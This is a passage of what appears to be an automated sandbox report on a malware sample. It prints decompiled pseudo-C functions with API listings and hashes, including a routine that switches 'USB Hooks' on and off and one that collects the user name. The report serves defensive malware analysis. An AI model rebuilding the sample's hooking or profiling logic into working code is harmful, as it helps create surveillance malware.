                                                                                                                                                                                                                            0x0045ef0a
                                                                                                                                                                                                                            0x0045ef18
                                                                                                                                                                                                                            0x0045ef1f
                                                                                                                                                                                                                            0x0045ef3c
                                                                                                                                                                                                                            0x0045ef3e
                                                                                                                                                                                                                            0x0045ef41
                                                                                                                                                                                                                            0x0045ef44
                                                                                                                                                                                                                            0x0045ef4f
                                                                                                                                                                                                                            0x0045ef61
                                                                                                                                                                                                                            0x0045ef61
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0045eb40
                                                                                                                                                                                                                            0x0045eb20

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SHGetPathFromIDList.SHELL32(00000000,?), ref: 0045EAF6
                                                                                                                                                                                                                            • NtdllDefWindowProc_A.USER32(?,?,?,?,00000000,0045EF62), ref: 0045EF34
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FromListNtdllPathProc_Window
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2126419269-0
                                                                                                                                                                                                                            • Opcode ID: a1ce6d3f9aa7d91b5e7c472632724b92cfdc2b2c75e54c672ccfa787c41adb86
                                                                                                                                                                                                                            • Instruction ID: 2b1d187c4c8c1c8eaadb8a9a71d85ca4ed6e9094f5dd7d40d25eedc3d4306855
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1ce6d3f9aa7d91b5e7c472632724b92cfdc2b2c75e54c672ccfa787c41adb86
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59E1B135A001449BDB18DF6AC489AEEB7B5AF08301F5480F6DC65DB397C7789E88CB19
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004289FC Relevance: 4.6, APIs: 3, Instructions: 51fileclipboardCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E004289FC(intOrPtr* __eax, void* __ecx, void* __edx) {
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				struct tagENHMETAHEADER _v104;
				void* __ebp;
				intOrPtr _t35;
				intOrPtr* _t37;
				struct HENHMETAFILE__* _t43;
				intOrPtr _t44;

				_t37 = __eax;
				_t43 = GetClipboardData(0xe);
				if(_t43 == 0) {
					_t35 =  *0x49dbf4; // 0x422ed8
					E00425F28(_t35);
				}
				E0042819C(_t37);
				_t44 =  *((intOrPtr*)(_t37 + 0x28));
				 *(_t44 + 8) = CopyEnhMetaFileA(_t43, 0);
				GetEnhMetaFileHeader( *(_t44 + 8), 0x64,  &_v104);
				 *((intOrPtr*)(_t44 + 0xc)) = _v72 - _v104.rclFrame;
				 *((intOrPtr*)(_t44 + 0x10)) = _v68 - _v76;
				 *((short*)(_t44 + 0x18)) = 0;
				 *((char*)(_t37 + 0x2c)) = 1;
				 *((char*)(_t37 + 0x22)) =  *((intOrPtr*)( *_t37 + 0x24))() & 0xffffff00 | _t31 != 0x00000000;
				return  *((intOrPtr*)( *_t37 + 0x10))();
			}












                                                                                                                                                                                                                            0x00428a05
                                                                                                                                                                                                                            0x00428a0e
                                                                                                                                                                                                                            0x00428a12
                                                                                                                                                                                                                            0x00428a14
                                                                                                                                                                                                                            0x00428a19
                                                                                                                                                                                                                            0x00428a19
                                                                                                                                                                                                                            0x00428a20
                                                                                                                                                                                                                            0x00428a25
                                                                                                                                                                                                                            0x00428a30
                                                                                                                                                                                                                            0x00428a3d
                                                                                                                                                                                                                            0x00428a48
                                                                                                                                                                                                                            0x00428a51
                                                                                                                                                                                                                            0x00428a54
                                                                                                                                                                                                                            0x00428a5a
                                                                                                                                                                                                                            0x00428a6a
                                                                                                                                                                                                                            0x00428a7c

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetClipboardData.USER32 ref: 00428A09
                                                                                                                                                                                                                            • CopyEnhMetaFileA.GDI32(00000000,00000000,0000000E), ref: 00428A2B
                                                                                                                                                                                                                            • GetEnhMetaFileHeader.GDI32(?,00000064,?,00000000,00000000,0000000E), ref: 00428A3D
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileMeta$ClipboardCopyDataHeader
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1752724394-0
                                                                                                                                                                                                                            • Opcode ID: 35eb50292ba042bd36530bb86496e29f59b9d8ff315851611da6a03c01692574
                                                                                                                                                                                                                            • Instruction ID: 0727d7d259e4847e38e41a473cb046f23bcddc174ccbaa46af5af426c499999d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35eb50292ba042bd36530bb86496e29f59b9d8ff315851611da6a03c01692574
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D117C71B003008FC710DFAED881A9ABBF8AF05310F10457EE909DB292DA74EC058B99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00458EA4 Relevance: 4.5, APIs: 3, Instructions: 33synchronizationthreadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458EA4() {
				struct tagPOINT _v12;
				void* _t5;
				long _t6;

				 *0x49ebc8 = GetCurrentThreadId();
				L5:
				_t5 =  *0x49ebcc; // 0x0
				_t6 = WaitForSingleObject(_t5, 0x64);
				if(_t6 == 0x102) {
					if( *0x49ebb8 != 0 &&  *((intOrPtr*)( *0x49ebb8 + 0x60)) != 0) {
						GetCursorPos( &_v12);
						if(E004397F4( &_v12) == 0) {
							E0045B3A8( *0x49ebb8);
						}
					}
					goto L5;
				}
				return _t6;
			}






                                                                                                                                                                                                                            0x00458eb5
                                                                                                                                                                                                                            0x00458ee5
                                                                                                                                                                                                                            0x00458ee7
                                                                                                                                                                                                                            0x00458eed
                                                                                                                                                                                                                            0x00458ef7
                                                                                                                                                                                                                            0x00458ebf
                                                                                                                                                                                                                            0x00458ecd
                                                                                                                                                                                                                            0x00458edc
                                                                                                                                                                                                                            0x00458ee0
                                                                                                                                                                                                                            0x00458ee0
                                                                                                                                                                                                                            0x00458edc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00458ebf
                                                                                                                                                                                                                            0x00458efd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00458EB0
                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00458ECD
                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,00000064), ref: 00458EED
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentCursorObjectSingleThreadWait
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1359611202-0
                                                                                                                                                                                                                            • Opcode ID: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                                                                                                                                                                                            • Instruction ID: 5466cc4fe75e799d867a24ddfff030feada42c46f86c6fe88e2ad44c126da2fb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a10eea83429d5fb08280e8928bc344b6cc34d434c05a26236856c7ecd38cde1d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F054315082049BDB14EB5AD887B5633A8EB14316F50017FE911E62D2DF7EA849C61E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00496E18 Relevance: 3.9, Strings: 3, Instructions: 145COMMONCrypto
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                                                                                            			E00496E18(intOrPtr __eax, void* __ebx, signed int __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t80;
				intOrPtr _t83;
				signed int _t95;
				intOrPtr _t106;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t133;
				intOrPtr _t134;
				intOrPtr _t138;
				intOrPtr _t140;
				intOrPtr _t141;

				_t140 = _t141;
				_push(0);
				_push(0);
				_t95 = __edx;
				_t138 = __eax;
				_push(_t140);
				_push(0x49702a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141;
				if((((0 |  *((intOrPtr*)(__eax + 0x314)) != 0x00000000) ^ 0x00000001) & __edx) != 0) {
					 *((intOrPtr*)(_t138 + 0x314)) = E0045F2E0(__eax, 1);
				}
				if(_t95 == 0) {
					_t64 =  *((intOrPtr*)(_t138 + 0x314));
					if( *((intOrPtr*)(_t138 + 0x314)) != 0) {
						E0045E724(_t64, 0);
						E004967D4(_t138, _t95, "USB Hooks -> Deactive");
					}
				} else {
					_push(_t140);
					_push(0x496fe6);
					_push( *[fs:edx]);
					 *[fs:edx] = _t141;
					_t111 =  *0x49f144; // 0x0
					E00404CCC( &_v8, 0x497040, _t111);
					if(E00409A58(_v8) == 0) {
						_t134 =  *0x49f144; // 0x0
						E00404CCC( &_v12, 0x497040, _t134);
						E00409F54(_v12);
					}
					E0041B944( *((intOrPtr*)( *((intOrPtr*)(_t138 + 0x314)) + 0xee)));
					_t80 = E0045F1B4( *((intOrPtr*)( *((intOrPtr*)(_t138 + 0x314)) + 0xee)));
					_t15 = _t80 + 0xc; // 0xc
					_t112 =  *0x49f144; // 0x0
					E00404CCC(_t15, 0x497040, _t112);
					 *((char*)(_t80 + 0x10)) = 1;
					_t83 =  *((intOrPtr*)(_t138 + 0x314));
					 *((intOrPtr*)(_t83 + 0x32)) = 0;
					 *((intOrPtr*)(_t83 + 0x36)) = 0;
					 *((intOrPtr*)(_t83 + 0x3a)) = 0;
					 *((intOrPtr*)(_t83 + 0x3e)) = 0;
					 *((intOrPtr*)(_t83 + 0x42)) = 0;
					 *((intOrPtr*)(_t83 + 0x46)) = 0;
					 *((intOrPtr*)(_t83 + 0x4a)) = 0;
					 *((intOrPtr*)(_t83 + 0x4e)) = 0;
					 *((intOrPtr*)(_t83 + 0x56)) = _t138;
					 *((intOrPtr*)(_t83 + 0x52)) = E00497080;
					 *((intOrPtr*)(_t83 + 0x5a)) = 0;
					 *((intOrPtr*)(_t83 + 0x5e)) = 0;
					 *((intOrPtr*)(_t83 + 0x66)) = _t138;
					 *((intOrPtr*)(_t83 + 0x62)) = E004971A8;
					 *((intOrPtr*)(_t83 + 0x6a)) = 0;
					 *((intOrPtr*)(_t83 + 0x6e)) = 0;
					 *((intOrPtr*)(_t83 + 0x72)) = 0;
					 *((intOrPtr*)(_t83 + 0x76)) = 0;
					 *((intOrPtr*)(_t83 + 0x7a)) = 0;
					 *((intOrPtr*)(_t83 + 0x7e)) = 0;
					 *((intOrPtr*)(_t83 + 0x82)) = 0;
					 *((intOrPtr*)(_t83 + 0x86)) = 0;
					 *((intOrPtr*)(_t83 + 0x8a)) = 0;
					 *((intOrPtr*)(_t83 + 0x8e)) = 0;
					 *((intOrPtr*)(_t83 + 0x92)) = 0;
					 *((intOrPtr*)(_t83 + 0x96)) = 0;
					 *((intOrPtr*)(_t83 + 0x9a)) = 0;
					 *((intOrPtr*)(_t83 + 0x9e)) = 0;
					 *((intOrPtr*)(_t83 + 0xa2)) = 0;
					 *((intOrPtr*)(_t83 + 0xa6)) = 0;
					 *((intOrPtr*)(_t83 + 0xaa)) = 0;
					 *((intOrPtr*)(_t83 + 0xae)) = 0;
					 *((intOrPtr*)(_t83 + 0xb2)) = 0;
					 *((intOrPtr*)(_t83 + 0xb6)) = 0;
					 *((intOrPtr*)(_t83 + 0xba)) = 0;
					 *((intOrPtr*)(_t83 + 0xbe)) = 0;
					 *((intOrPtr*)(_t83 + 0xc2)) = 0;
					 *((intOrPtr*)(_t83 + 0xc6)) = 0;
					 *((intOrPtr*)(_t83 + 0xca)) = 0;
					 *((intOrPtr*)(_t83 + 0xce)) = 0;
					E0045E724(_t83, 1);
					E004967D4(_t138, _t80, "USB Hooks -> Active");
					_pop(_t133);
					 *[fs:eax] = _t133;
				}
				_pop(_t106);
				 *[fs:eax] = _t106;
				_push(0x497031);
				return E004049E4( &_v12, 2);
			}
















                                                                                                                                                                                                                            0x00496e19
                                                                                                                                                                                                                            0x00496e1b
                                                                                                                                                                                                                            0x00496e1d
                                                                                                                                                                                                                            0x00496e22
                                                                                                                                                                                                                            0x00496e24
                                                                                                                                                                                                                            0x00496e28
                                                                                                                                                                                                                            0x00496e29
                                                                                                                                                                                                                            0x00496e2e
                                                                                                                                                                                                                            0x00496e31
                                                                                                                                                                                                                            0x00496e42
                                                                                                                                                                                                                            0x00496e52
                                                                                                                                                                                                                            0x00496e52
                                                                                                                                                                                                                            0x00496e5a
                                                                                                                                                                                                                            0x00496ff2
                                                                                                                                                                                                                            0x00496ffa
                                                                                                                                                                                                                            0x00496ffe
                                                                                                                                                                                                                            0x0049700a
                                                                                                                                                                                                                            0x0049700a
                                                                                                                                                                                                                            0x00496e60
                                                                                                                                                                                                                            0x00496e62
                                                                                                                                                                                                                            0x00496e63
                                                                                                                                                                                                                            0x00496e68
                                                                                                                                                                                                                            0x00496e6b
                                                                                                                                                                                                                            0x00496e76
                                                                                                                                                                                                                            0x00496e7c
                                                                                                                                                                                                                            0x00496e8b
                                                                                                                                                                                                                            0x00496e95
                                                                                                                                                                                                                            0x00496e9b
                                                                                                                                                                                                                            0x00496ea3
                                                                                                                                                                                                                            0x00496ea3
                                                                                                                                                                                                                            0x00496eb4
                                                                                                                                                                                                                            0x00496ec5
                                                                                                                                                                                                                            0x00496ecc
                                                                                                                                                                                                                            0x00496ed4
                                                                                                                                                                                                                            0x00496eda
                                                                                                                                                                                                                            0x00496edf
                                                                                                                                                                                                                            0x00496ee3
                                                                                                                                                                                                                            0x00496eeb
                                                                                                                                                                                                                            0x00496eee
                                                                                                                                                                                                                            0x00496ef3
                                                                                                                                                                                                                            0x00496ef6
                                                                                                                                                                                                                            0x00496efb
                                                                                                                                                                                                                            0x00496efe
                                                                                                                                                                                                                            0x00496f03
                                                                                                                                                                                                                            0x00496f06
                                                                                                                                                                                                                            0x00496f09
                                                                                                                                                                                                                            0x00496f0c
                                                                                                                                                                                                                            0x00496f15
                                                                                                                                                                                                                            0x00496f18
                                                                                                                                                                                                                            0x00496f1b
                                                                                                                                                                                                                            0x00496f1e
                                                                                                                                                                                                                            0x00496f27
                                                                                                                                                                                                                            0x00496f2a
                                                                                                                                                                                                                            0x00496f2f
                                                                                                                                                                                                                            0x00496f32
                                                                                                                                                                                                                            0x00496f37
                                                                                                                                                                                                                            0x00496f3a
                                                                                                                                                                                                                            0x00496f3f
                                                                                                                                                                                                                            0x00496f45
                                                                                                                                                                                                                            0x00496f4d
                                                                                                                                                                                                                            0x00496f53
                                                                                                                                                                                                                            0x00496f5b
                                                                                                                                                                                                                            0x00496f61
                                                                                                                                                                                                                            0x00496f69
                                                                                                                                                                                                                            0x00496f6f
                                                                                                                                                                                                                            0x00496f77
                                                                                                                                                                                                                            0x00496f7d
                                                                                                                                                                                                                            0x00496f85
                                                                                                                                                                                                                            0x00496f8b
                                                                                                                                                                                                                            0x00496f93
                                                                                                                                                                                                                            0x00496f99
                                                                                                                                                                                                                            0x00496fa1
                                                                                                                                                                                                                            0x00496fa7
                                                                                                                                                                                                                            0x00496faf
                                                                                                                                                                                                                            0x00496fb5
                                                                                                                                                                                                                            0x00496fbd
                                                                                                                                                                                                                            0x00496fc3
                                                                                                                                                                                                                            0x00496fcb
                                                                                                                                                                                                                            0x00496fd7
                                                                                                                                                                                                                            0x00496fde
                                                                                                                                                                                                                            0x00496fe1
                                                                                                                                                                                                                            0x00496fe1
                                                                                                                                                                                                                            0x00497011
                                                                                                                                                                                                                            0x00497014
                                                                                                                                                                                                                            0x00497017
                                                                                                                                                                                                                            0x00497029

                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: USB Hooks -> Active$USB Hooks -> Deactive$\WS
                                                                                                                                                                                                                            • API String ID: 0-2668585806
                                                                                                                                                                                                                            • Opcode ID: a68f3ea6cb02ce5dad457843472a772aaadbee1f170168573917ccbb51b3d805
                                                                                                                                                                                                                            • Instruction ID: 21d0f2a4fcc44797754ad5cfb282af012faa24cd7fd9520cc74cc85fb853990d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a68f3ea6cb02ce5dad457843472a772aaadbee1f170168573917ccbb51b3d805
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A251EBB1A04A448FD718DF2BC845B96BBE6EFC8304F16C0BBD4089B376E73599058B59
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00472E58 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00472E58(void* __eax, void* __ebx, void* __ecx) {
				char _v8;
				long _v12;
				void* _t26;
				intOrPtr _t35;
				void* _t39;

				_v8 = 0;
				_t26 = __eax;
				_push(_t39);
				_push(0x472ed2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t39 + 0xfffffff8;
				_v12 = 0xff;
				E0040500C( &_v8, _v12);
				if(GetUserNameA(E00404E80(_v8),  &_v12) == 0) {
					E00404A14(_t26, "Unknown");
				} else {
					E00404EE0(_v8, _v12 - 1, 1, _t26);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(0x472ed9);
				return E004049C0( &_v8);
			}








                                                                                                                                                                                                                            0x00472e61
                                                                                                                                                                                                                            0x00472e64
                                                                                                                                                                                                                            0x00472e68
                                                                                                                                                                                                                            0x00472e69
                                                                                                                                                                                                                            0x00472e6e
                                                                                                                                                                                                                            0x00472e71
                                                                                                                                                                                                                            0x00472e74
                                                                                                                                                                                                                            0x00472e81
                                                                                                                                                                                                                            0x00472e9a
                                                                                                                                                                                                                            0x00472eb7
                                                                                                                                                                                                                            0x00472e9c
                                                                                                                                                                                                                            0x00472ea9
                                                                                                                                                                                                                            0x00472ea9
                                                                                                                                                                                                                            0x00472ebe
                                                                                                                                                                                                                            0x00472ec1
                                                                                                                                                                                                                            0x00472ec4
                                                                                                                                                                                                                            0x00472ed1

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00472E93
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameUser
                                                                                                                                                                                                                            • String ID: Unknown
                                                                                                                                                                                                                            • API String ID: 2645101109-1654365787
                                                                                                                                                                                                                            • Opcode ID: 5b6e7aaaec9e298c770fb3111eeb0c4b82573b49f98721f3986b5109218376cd
                                                                                                                                                                                                                            • Instruction ID: 0e574cec38e77eee5c3ac86c404587bc9d0c2a183e22f9869122a41002a7b21b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b6e7aaaec9e298c770fb3111eeb0c4b82573b49f98721f3986b5109218376cd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2016770A04508ABDB00DBA6DD4199EB7E9EB88304F61817AA504E3691D778AE01955D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0044083C Relevance: 3.1, APIs: 2, Instructions: 63windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E0044083C(intOrPtr* __eax, intOrPtr __edx) {
				intOrPtr _v8;
				void* __ecx;
				void* _t25;
				intOrPtr* _t31;
				void* _t34;
				intOrPtr* _t37;
				void* _t45;

				_v8 = __edx;
				_t37 = __eax;
				if(( *(_v8 + 4) & 0x0000fff0) != 0xf100 ||  *((short*)(_v8 + 8)) == 0x20 ||  *((short*)(_v8 + 8)) == 0x2d || IsIconic( *(__eax + 0x180)) != 0 || GetCapture() != 0) {
					L8:
					if(( *(_v8 + 4) & 0x0000fff0) != 0xf100) {
						L10:
						return  *((intOrPtr*)( *_t37 - 0x10))();
					}
					_t25 = E0044078C(_t37, _t45);
					if(_t25 == 0) {
						goto L10;
					}
				} else {
					_t31 =  *0x49dbcc; // 0x49ebb8
					if(_t37 ==  *((intOrPtr*)( *_t31 + 0x44))) {
						goto L8;
					} else {
						_t34 = E004519E0(_t37);
						_t44 = _t34;
						if(_t34 == 0) {
							goto L8;
						} else {
							_t25 = E0043C130(_t44, 0, 0xb017, _v8);
							if(_t25 == 0) {
								goto L8;
							}
						}
					}
				}
				return _t25;
			}










                                                                                                                                                                                                                            0x00440842
                                                                                                                                                                                                                            0x00440845
                                                                                                                                                                                                                            0x00440857
                                                                                                                                                                                                                            0x004408b5
                                                                                                                                                                                                                            0x004408c5
                                                                                                                                                                                                                            0x004408d4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004408db
                                                                                                                                                                                                                            0x004408ca
                                                                                                                                                                                                                            0x004408d2
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00440886
                                                                                                                                                                                                                            0x00440886
                                                                                                                                                                                                                            0x00440890
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00440892
                                                                                                                                                                                                                            0x00440894
                                                                                                                                                                                                                            0x00440899
                                                                                                                                                                                                                            0x0044089d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0044089f
                                                                                                                                                                                                                            0x004408ac
                                                                                                                                                                                                                            0x004408b3
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004408b3
                                                                                                                                                                                                                            0x0044089d
                                                                                                                                                                                                                            0x00440890
                                                                                                                                                                                                                            0x004408e2

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286719148.00000000004A5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_uniformerede.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CaptureIconic
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2277910766-0
                                                                                                                                                                                                                            • Opcode ID: 850b444ef3a58a1a1115db53f267b44a64354c32b35f7766e8262930511a7e18
                                                                                                                                                                                                                            • Instruction ID: 1854ad3725da6f9c39b561de1c6dc083fd0ae92529cbbd4a26d730481ff8a107
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 850b444ef3a58a1a1115db53f267b44a64354c32b35f7766e8262930511a7e18
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2114231B00205DBFB24FF59C685AAAB3F4AF04304B24407AF504EB352DB38ED549B98
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00425FB8 Relevance: 3.0, APIs: 2, Instructions: 46windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00425FB8(void* __ebx) {
				char _v260;
				char _v264;
				long _t21;
				void* _t22;
				intOrPtr _t27;
				void* _t32;

				_v264 = 0;
				_push(_t32);
				_push(0x426054);
				_push( *[fs:eax]);
				 *[fs:eax] = _t32 + 0xfffffefc;
				_t21 = GetLastError();
				if(_t21 == 0 || FormatMessageA(0x1000, 0, _t21, 0x400,  &_v260, 0x100, 0) == 0) {
					E00425F64(_t22);
				} else {
					E00404C30( &_v264, 0x100,  &_v260);
					E0040D144(_v264, 1);
					E00404378();
				}
				_pop(_t27);
				 *[fs:eax] = _t27;
				_push(0x42605b);
				return E004049C0( &_v264);
			}









                                                                                                                                                                                                                            0x00425fc4
                                                                                                                                                                                                                            0x00425fcc
                                                                                                                                                                                                                            0x00425fcd
                                                                                                                                                                                                                            0x00425fd2
                                                                                                                                                                                                                            0x00425fd5
                                                                                                                                                                                                                            0x00425fdd
                                                                                                                                                                                                                            0x00425fe1
                                                                                                                                                                                                                            0x00426036
                                                                                                                                                                                                                            0x00426007
                                                                                                                                                                                                                            0x00426018
                                                                                                                                                                                                                            0x0042602a
                                                                                                                                                                                                                            0x0042602f
                                                                                                                                                                                                                            0x0042602f
                                                                                                                                                                                                                            0x0042603d
                                                                                                                                                                                                                            0x00426040
                                                                                                                                                                                                                            0x00426043
                                                                                                                                                                                                                            0x00426053

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,00426054), ref: 00425FD8
                                                                                                                                                                                                                            • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,00426054), ref: 00425FFE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000006.00000002.286644380.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286640242.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000006.00000002.286711673.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
